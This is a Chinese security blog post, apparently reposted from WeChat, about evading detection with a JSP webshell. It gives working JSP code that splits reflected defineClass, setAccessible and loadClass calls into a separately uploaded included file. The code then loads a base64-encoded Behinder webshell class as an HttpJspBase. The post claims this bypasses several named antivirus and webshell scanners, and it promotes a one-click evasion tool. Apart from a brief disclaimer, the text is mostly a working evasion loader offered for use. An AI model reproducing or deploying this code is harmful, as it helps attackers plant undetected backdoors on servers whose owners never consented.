JSP木马免杀-分离加载类文件

admin

102755
文章

87
评论

2023年12月1日20:36:58评论41 views字数 2868阅读9分33秒阅读模式

JSP木马免杀-分离加载类文件

一位苦于信息安全的萌新小白帽

本实验仅用于信息防御教学，切勿用于它用途

公众号：XG小刚

今天更新了XG拟态V1.5版本

本文介绍一下jspdemo7的免杀原理

https://github.com/xiaogang000/XG_NTAI

原理

采用分离免杀和文件包含的原理，将高危函数放在单独jsp文件(类jsp)中等待调用，在webshell中文件包含该jsp(类jsp)

单文件检测时沙箱无法调用(类jsp)，从而导致500报错，从而绕过

基础文件(类jsp)

将需要使用的高危函数defineClass、setAccessible、loadClass等使用反射获取到对应的method

放在一个自定义类里等待调用

然后将该类写成jsp文件单独上传(这里称为: 类jsp)，并记录上传后的jsp文件名(比如：method.jsp)。

<%!public static class M {    M(){}    public static java.util.Map<String,Object> getmethod () throws Exception {        java.util.HashMap<String, Object> map = new java.util.HashMap<String, Object>();        java.lang.reflect.Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);        map.put("defineClass",defineClass);        java.lang.reflect.Method setAccessible = java.lang.reflect.AccessibleObject.class.getMethod("setAccessible", boolean.class);        map.put("setAccessible",setAccessible);        java.lang.reflect.Method loadClass = ClassLoader.class.getDeclaredMethod("loadClass", String.class);        map.put("loadClass",loadClass);        return map;    }}%>

使用文件包含调用M类

在webshell中将tomcat某版本解析出的冰蝎class文件使用base64存储

解码后使用defineClass注册成为一个类

String yBTRKS_jsp = "ZHFxxxxxxx";              byte[] classBytes_yBTRKS_jsp = Base64.getDecoder().decode(yBTRKS_jsp);              yBTRKS_jsp = new String(classBytes_yBTRKS_jsp);              classBytes_yBTRKS_jsp = Base64.getDecoder().decode(yBTRKS_jsp.substring(24));

在webshell中使用include包含(类jsp)

<%@ include file="method.jsp"%>

才能使用(Method)M.getmethod().get("defi"+"neClass");获取到defineClass函数

Method defineClass = (Method)M.getmethod().get("defi"+"neClass");              Method setAccessible = (Method)M.getmethod().get("setA"+"ccessible");              Method loadClass = (Method)M.getmethod().get("loadC"+"lass");              setAccessible.invoke(defineClass,true);

然后再使用invoke()函数执行，并注册成为一个HttpJspBase即可

<%@ page pageEncoding="UTF-8" %><%@ page import="java.util.*" %><%@ page import="java.lang.reflect.*" %><%@ page import="org.apache.jasper.runtime.HttpJspBase" %><%@ include file="method.jsp"%><%    String yBTRKS_jsp = "ZHFxxxxxxx";    byte[] classBytes_yBTRKS_jsp = Base64.getDecoder().decode(yBTRKS_jsp);    yBTRKS_jsp = new String(classBytes_yBTRKS_jsp);    classBytes_yBTRKS_jsp = Base64.getDecoder().decode(yBTRKS_jsp.substring(24));
    Method defineClass = (Method)M.getmethod().get("defi"+"neClass");    Method setAccessible = (Method)M.getmethod().get("setA"+"ccessible");    Method loadClass = (Method)M.getmethod().get("loadC"+"lass");    setAccessible.invoke(defineClass,true);    Class aClass = null;    try {        defineClass.invoke(application.getClassLoader(), "org.apache.jsp.yBTRKS_jsp", classBytes_yBTRKS_jsp, 0, classBytes_yBTRKS_jsp.length);
    }catch (Exception exception){        aClass = (Class) loadClass.invoke(application.getClassLoader(), "org.apache.jsp.yBTRKS_jsp");    }    HttpJspBase httpJspBase = (HttpJspBase) aClass./*test*/            newInstance();    httpJspBase.init(pageContext.getServletConfig());    httpJspBase.service(request, response);%>

可免杀：

阿里云恶意文件检测平台、阿里云主机病毒查杀、河马在线、河马本地(1.8.2)、
D盾(2.1.7)、微步(安全)、VT(0红)

JSP木马免杀-分离加载类文件

使用XG_NTAI.jar一键免杀即可

JSP木马免杀-分离加载类文件

XG拟态会持续更新免杀demo，多多支持star

原文始发于微信公众号（XG小刚）：JSP木马免杀-分离加载类文件

左青龙
微信扫一扫

右白虎
微信扫一扫

JSP木马免杀-分离加载类文件

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

AI安全白皮书 - 华为

人工智能硬件安全白皮书 - DUEROS百度安全

漏洞挖掘 | 某学工平台越权

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

owasp大模型应用威胁视图理解大模型应用目前所面临的主要安全威胁

新一代供应链安全攻击面

《生成式人工智能数据应用合规指南》正式发布，5月1日实施

发表评论

在线咨询

微信